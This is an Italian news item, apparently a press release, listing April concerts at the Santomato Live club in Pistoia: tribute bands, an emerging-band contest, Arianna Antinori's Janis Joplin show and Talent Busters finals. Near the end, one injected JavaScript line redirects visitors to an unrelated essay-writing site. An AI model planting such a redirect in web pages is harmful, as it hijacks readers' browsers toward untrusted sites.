SANTOMATO LIVE. UN APRILE DI GRANDE MUSICA

Arianna Antinori
Arianna Antinori

PISTOIA. Un aprile di grande musica al Santomato Live, all’interno del Circolo Arci di Santomato, in Via Montalese, 25/A, a Santomato Pistoia (website: www.santomatolive.it, pagina Facebook Santomato Live). Calendario ricco d’appuntamenti per tutti i gusti, stilato dall’estroso direttore artistico Tony De Angelis. L’inizio, subito forte, è fissato per domani, giovedì 3, con la presentazione ufficiale del primo cd deiBlues & Jetta, “Help me write her a song: di scena Lorenzo Pacini, voce e chitarra ritmica, Tommaso Tempestini, chitarra solista, Lorenzo Boccaccini, organo e tastiera, e Giacomo Folchi, batteria. Aprirà la serata la Skiffles Rock Band e per la prima volta i Blues & Jetta si misureranno con il gruppo vocale Univocal Chorus. Gran finale con una jam session aperta a tutti i musicisti.

Giovedì 10 sarà il turno di speciale Rolling Stones e di conseguenza della band fiorentina Crazy Mama, che meglio rappresenta il tributo alla mitica band dal 1988. Per anticipare il grande evento che si terrà il 22 giugno a Roma, saliranno sul palco le nostre Pietre Rotolanti Toscane: Andrea Orlandini, voce, Sergio Chellini, chitarra, Matteo Abbate, chitarra, Gianni Mariottini, basso, Alessandro Nutini, batteria, Paolo Baglioni, percussioni, cori, e Federico Pacini, tastiere. Ad aprire la serata i fiorentini The Outsiders, band di eccellenti musicisti: Fabrizio Pieraccini, Alessio Vitali e Stefano Puccianti per uno stupendo viaggio da Hendrix ai Led Zeppelin passando per Who, Deep Purple, Genesis, Jethro Tull, Boston, Deff Leppard, Van Hallen, Yes e Police.

Giovedì 17 è in programma la 5° giornata del Campionato delle band emergenti. In gara altre 6 band: i Quattro Quinti e i Symphonia di Pistoia, i Silly Riff e s di Prato, i Raggamun di Firenze e i Jesters di San Marcello Pistoiese. Giuria tecnica formata da Diego Lopilato, Niccolò Nikko Menichini, Davide Malito e Giuliana Monti. Il pubblico presente avrà diritto di voto.
Il clou del mese è previsto giovedì 24: si esibirà in esclusiva per la Toscana Arianna Antinori (nelle foto), una delle grandi artiste della musica rock contemporanea. Con i Turtle Blues, Arianna Antinori proporrà un tributo al rock psichedelico anni Sessanta/Settanta, passando per Janis Joplin, Led Zeppelin, Beatles e Ac/Dc sino ad arrivare ai brani del suo primo album intitolato “AriannAntinori”.

Ricordiamo che nel 2010 Antinori si è aggiudicata il primo premio del contest internazionale “Cheap Thrills: You inspired by Janis Joplin”, concorso indetto via-web dalla famiglia di Janis per la miglior interpretazione della celeberrima canzone “Mercedes Benz“.

Arianna Antinori
Arianna Antinori

Antinori sarà accompagnata da Davide Pezzin, basso/cori, Davide Repele,chitarra/cori, Giovanni De Roit, chitarra/cori, e Davide Devito, batteria, in pratica dal neo bassista di Ligabue e dal batterista di Cristiano De Andrè. Durante l’evento sarà possibile visitare una mostra di oggetti e lettere inedite appartenute a Janis Joplin. A leggerne alcune penserà Valeria Neri, altra cantante che adora Janis. “Arriva Vascoa salire sul palco sarà La Combriccola del Blasco nella formazione completa capitanata da Adamo ”Adams” Paoletti, la voce storica, Federico Taddei, batteria, Claudia Natili, basso, Giacomo Parretti, tastiere/cori, Massimo Nuti, chitarre/cori, e Mario Ramunni, chitarre.

Il Santomato Live, inoltre, potrà contare su Talent Busters 3 – le finali”, il format di successo ideato da Tony De Angelis ed Elisabetta Branchetti: venerdì 4 aprile serata di solidarietà AIL e Voglia di Vivere dal titolo Voglia di Festival 2 nella quale saranno comunicati i nomi dei 24 finalisti della manifestazione. Ospiti d’onore saranno Giuseppe Scianna e Francesco Guasti, reduci da The Voice, e molti altri, mentre mercoledì 9 e 16 aprile saranno registrate le due semifinali e venerdì 25 la finale, che andranno in onda su Toscana Tv. In queste occasioni il pubblico presente ascolterà e sosterrà il talento preferito.
Ricordiamo che tutte le serate avranno inizio alle ore 20.30 con una ricca cena a buffet più drink e live, oppure dopo le 22 con drink e live. Per ulteriori informazioni ed eventuali prenotazioni è possibile chiamare il numero telefonico 0573/479957 o scrivere una mail a info@santomatolive.it.

[comunicato]

redazione@linealibera.info


window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT64H0306913834100000008677 su Intesa San Paolo Spa - Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

Lascia un commento